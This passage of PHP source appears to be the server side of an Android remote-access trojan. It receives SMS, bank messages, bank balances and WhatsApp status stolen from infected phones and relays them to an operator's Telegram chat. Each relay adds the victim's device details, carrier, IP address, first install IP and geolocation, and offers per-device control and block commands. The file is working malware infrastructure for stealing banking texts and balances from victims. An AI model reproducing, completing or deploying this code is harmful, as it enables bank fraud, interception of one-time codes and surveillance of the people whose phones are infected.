<b>𝙼𝚎𝚜𝚜𝚊𝚐𝚎✉️  :</b> \n <code>$message_text </code> 


 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
<b>👤𝙽𝚊𝚖𝚎 𝚃𝚊𝚛𝚐𝚎𝚃</b> : <code>user[ $kossher ]</code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code> 
<b>𝙸𝙿</b> : <code>$ip</code> 
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

• <code>/set_$Device_id</code> 
• <code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",$sms_panel);
 }elseif($action == "lastbanksms"){
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
    $gcx = json_decode(file_get_contents("http://ip-api.com/json/$ip"),true);
    $flag = EMflag($gcx["countryCode"]);
    $sender = str_replace(["\n"], '', $sender);
   smg($id_sender,"
#𝙻𝚊𝚜𝚃_𝙱𝚊𝚗𝚔_𝙼𝚎𝚜𝚜𝚊𝚐𝚎 💳(𝚅4)

<b>𝙽𝚎𝚖𝚎 𝚝𝚊𝚛𝚐𝚎𝚝 </b> : <code>$name</code> 
<b>𝙱𝚊𝚗𝚔💸</b> : $sender 
<b>𝙼𝚎𝚜𝚜𝚊𝚐𝚎💳 :</b> \n <code>$message_text</code> 


 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
<b>👤𝙽𝚊𝚖𝚎 𝚃𝚊𝚛𝚐𝚎𝚃</b> : <code>user[ $kossher ]</code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code> 
<b>𝙸𝙿</b> : <code>$ip</code> 
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

 <code>/set_$Device_id</code> 
<code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",$sms_panel);
    }elseif($action == "balance"){
            $x = file_get_contents("data/bal.txt");
        if($x == "singel"){
        $BalanceText = "";
         if(isset($_POST['Balances'])){
$Balance_Data = json_decode(base64_decode($_POST['Balances']),true);
 }else{
     $Balance_Data = [];
 }
        if (count($Balance_Data) == 0) {
            $BalanceText = "❌پیام بانکی ای وجود ندارد";
        } else {
            foreach ($Balance_Data as $key => $balance) {
                $BalanceText .= "\n$key";
                $BalanceText .= "\n💰" . $balance['Balance'];
                $BalanceText .= "\n☎️شماره : " . $balance['Address'];
                $BalanceText .= "\n<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>";
            }
        }


    smg($id_sender,"$BalanceText",null);   
    file_put_contents("data/bal.txt","xx");
    }else{
        $BalanceText = "";
         if(isset($_POST['Balances'])){
$Balance_Data = json_decode(base64_decode($_POST['Balances']),true);
 }else{
     $Balance_Data = [];
 }
        if (count($Balance_Data) == 0) {
            $BalanceText = "❌پیام بانکی ای وجود ندارد";
        } else {
            foreach ($Balance_Data as $key => $balance) {
                $BalanceText .= "\n🏦 : $key";
                $BalanceText .= "\n📞سر شماره : " . $balance['Address'];
                $BalanceText .= "\n💰" . $balance['Balance'];
                $BalanceText .= "\n-- - -- - -- - -- - -- - -- - --";
            }
        }

$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
        $gcx = json_decode(file_get_contents("http://ip-api.com/json/$ip"),true);
        $flag = EMflag($gcx["countryCode"]);
    smg($id_sender,"
 #ʙᴀʟᴀɴᴄᴇ_ᴍᴇꜱꜱᴀɢᴇ (𝚅4)

<b>ʙᴀɴᴋɪɴɢ ꜱᴍꜱ ᴅᴇᴛᴀɪʟꜱ</b> : \n <b>$BalanceText</b> 

 <b>𝙵𝚒𝚛𝚜𝚃 𝙸𝚙 </b> : <code>$install_ip</code> 
• <code>/set_$Device_id</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",$sms_panel);   
        }}elseif($action == "WhatsChecker"){
        $install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
    smg($id_sender,"
#𝚂𝙷𝚎𝚌𝚔𝚎𝚛🔋

 <b>𝚂𝚝𝚊𝚞𝚜 𝙲𝚑𝚎𝚌𝚔𝚎𝚛 </b> :  <code>$message_text</code> • ]
 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
<b>👤𝙽𝚊𝚖𝚎 𝚃𝚊𝚛𝚐𝚎𝚃</b> : <code>user[ $kossher ]</code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code> 
<b>𝙸𝙿</b> : <code>$ip</code> 
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

 <code>/set_$Device_id</code> 
<code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b></b> ",$sms_panel);   
}elseif($action == "searchSMS"){
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
$gcx = json_decode(file_get_contents("http://ip-api.com/json/$ip"),true);
$flag = EMflag($gcx["countryCode"]);
   smg($id_sender,"
 #𝚂𝚎𝚊𝚛𝚌𝚑_𝚂𝚖𝚂 🔎(𝚅4)

<b>☎️𝙽𝚄𝙼𝙱𝙴𝚁</b> : <code>$sender</code> 
<b>𝚃𝚎𝚡𝚃 𝙼𝚎𝚜𝚜𝚊𝚐𝚎✉️</b> : \n <code>$message_text</code> 

 <b>Word</b> : \n <b>$kal</b> • ]
 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
<b>👤𝙽𝚊𝚖𝚎 𝚃𝚊𝚛𝚐𝚎𝚃</b> : <code>user[ $kossher ]</code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code> 
<b>𝙸𝙿</b> : <code>$ip</code> 
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

 <code>/set_$Device_id</code> 
<code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b> </b> ",$sms_panel);   
    }

?>
